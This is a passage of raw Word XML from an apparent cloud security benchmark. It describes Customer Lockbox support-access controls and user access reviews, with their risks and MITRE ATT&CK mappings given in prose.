      <w:r w:rsidRPr="00E53977">
        <w:t>PA-8: Determine access process for cloud provider support</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="735DA269" w14:textId="33100463" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210015B1" w14:textId="1A9CB8BE" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="797096CD" w14:textId="125A396D" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized data access via cloud provider support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7537BD1F" w14:textId="2030B0E2" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Insider threat exploitation through provider access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F242A1A" w14:textId="7E01F4C6" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Potential for malicious or negligent cloud </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>provider insiders</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> to abuse privileged access, leading to data exfiltration or unauthorized modifications within customer tenants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B53FF46" w14:textId="414FE7FE" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Opaque access operations without visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178200DB" w14:textId="6CE154D9" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Lack of visibility </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> data access events, hindering traceability and accountability, which can erode trust and violate audit requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB22DB5" w14:textId="55C74887" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Excessive privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E45CA" w14:textId="7FDBA9B7" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk of cloud provider support engineers obtaining overly broad access scopes, exceeding the least privilege principle and increasing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>the attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> surface within cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D97E1" w14:textId="3753A1B9" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Regulatory non-compliance with audit requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E7F33C" w14:textId="69B8F827" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Uncontrolled data access violating data protection frameworks (e.g., GDPR, HIPAA, CCPA), risking non-compliance penalties due to inadequate access governance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF19DC" w14:textId="3A89D047" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Data exposure during support operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD5A4C" w14:textId="575D41BD" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B2E80" w14:textId="789CE300" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Valid Accounts (T1078.004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47018C90" w14:textId="0BAE8307" w:rsidR="004D6C85" w:rsidRPr="00E53977" w:rsidRDefault="004D6C85" w:rsidP="004D6C85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D6C85">
        <w:t>Exploitation of compromised or misused cloud account credentials, such as those of support personnel, to access customer data in cloud environments, bypassing standard authentication controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53DDC0" w14:textId="139A2C13" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Account Manipulation (T1098.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731DE972" w14:textId="0EA53EBB" w:rsidR="004D6C85" w:rsidRPr="00E53977" w:rsidRDefault="004D6C85" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D6C85">
        <w:t>Addition of unauthorized credentials, like keys or tokens, to cloud identity services or applications, enabling persistent access to customer resources during support operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613EB8A0" w14:textId="747DFA81" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Brute Force (T1110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D1AD6" w14:textId="211AC06C" w:rsidR="004D6C85" w:rsidRPr="00E53977" w:rsidRDefault="004D6C85" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D6C85">
        <w:t>Repeated attempts to guess cloud account credentials, such as those used by support engineers, to gain unauthorized access to customer data during troubleshooting activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415C7DE" w14:textId="13534F44" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Steal Application Access Token (T1528)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3AC5B" w14:textId="4FEA99A0" w:rsidR="004D6C85" w:rsidRPr="00E53977" w:rsidRDefault="004D6C85" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D6C85">
        <w:t>Theft of access tokens used by support personnel to interact with customer cloud resources, facilitating unauthorized data access or lateral movement within the tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FC0BE5" w14:textId="2F2D8776" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>OS Credential Dumping (T1003.006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7FD3C8" w14:textId="5D7105FC" w:rsidR="004D6C85" w:rsidRPr="00E53977" w:rsidRDefault="004D6C85" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004D6C85">
        <w:lastRenderedPageBreak/>
        <w:t>Extraction of credentials from cloud identity services by insiders with temporary elevated access, allowing synchronization of sensitive identity data for persistent access.</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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement Customer Lockbox through the following process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6820707E" w14:textId="78729F6E" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable Lockbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F812D" w14:textId="35E107A3" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initiate support request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A4E12" w14:textId="6D7DBE69" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Users open support tickets in the Azure portal for workload issues, where Microsoft support engineers review tickets and determine if data access is needed beyond standard troubleshooting tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81B19F" w14:textId="427BBB24" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Request elevated access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154BA9D" w14:textId="79210257" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Notify designated approvers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FC1CF" w14:textId="30886343" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Designated approvers (Subscription Owners, Global Admins, or Azure Customer Lockbox Approvers) receive email notifications with request details and links to the Lockbox blade, with alternate email notifications configurable for non-email-enabled accounts or service principals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233E6E5" w14:textId="594D8FE3" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Review and approve or deny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3AAAE" w14:textId="2EC4E806" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Approvers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>sign</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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5" w:name="_Toc242449498"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Monitor and governance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="1D5474EE" w14:textId="17DC78F8" w:rsidR="00496091" w:rsidRPr="00E53977" w:rsidRDefault="00496091" w:rsidP="00496091">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc242449499"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>PA-4: Review and reconcile user access regularly</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="6CA0699F" w14:textId="4AEB3864" w:rsidR="00496091" w:rsidRPr="00E53977" w:rsidRDefault="00496091" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765AB87" w14:textId="4003B07D" w:rsidR="00496091" w:rsidRPr="00E53977" w:rsidRDefault="00496091" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="218E6B8C" w14:textId="1D7806DD" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized access due to excessive permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3B2D3" w14:textId="23CB1C88" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Identities granted more access rights than required, violating least privilege and increasing the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5585DF46" w14:textId="5FC26CDD" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Stale or orphaned access from unmanaged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED6068" w14:textId="163DB84D" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Permissions retained after they are no longer needed or accounts left active after user departure, enabling potential exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94C86D" w14:textId="2D353C9F" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider threats from misconfigured or unmonitored access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A08D83F" w14:textId="1C4B1C76" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Authorized users misusing permissions due to misconfigured policies or lack of oversight, including bypassing approval processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D0BBF" w14:textId="15C306EE" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Non-compliance with regulatory standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712C1D5" w14:textId="1807DFF8" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Failure to enforce least privilege, access auditing, or timely deprovisioning, risking violations of standards like GDPR, HIPAA, SOC 2, or ISO 27001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0BDC2" w14:textId="56040786" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Human </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>error</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> in access management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0034E0C6" w14:textId="5E3179DB" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Manual processes leading to incorrect permission grants, overlooked deprovisioning, or misconfigured approval chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855ABC9" w14:textId="2594114B" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of auditability and traceability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F7F724" w14:textId="08D3E7B5" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Absence of proper logging and documentation, hindering tracking of access requests, approvals, or provisioning, delaying breach detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D37A3B" w14:textId="0949E98D" w:rsidR="00040C4D" w:rsidRPr="00E53977" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB860B" w14:textId="0C3EF48A" w:rsidR="00040C4D" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B649C90" w14:textId="4E3FBB5F" w:rsidR="003513EC" w:rsidRPr="00E53977" w:rsidRDefault="003513EC" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="003513EC">
        <w:t>exploiting valid accounts (T1078.004) by leveraging compromised or stale cloud credentials, such as over-privileged service accounts, to authenticate to APIs or management consoles, enabling unauthorized access to cloud resources without triggering alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF03A17" w14:textId="5AE45142" w:rsidR="00040C4D" w:rsidRDefault="00040C4D" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
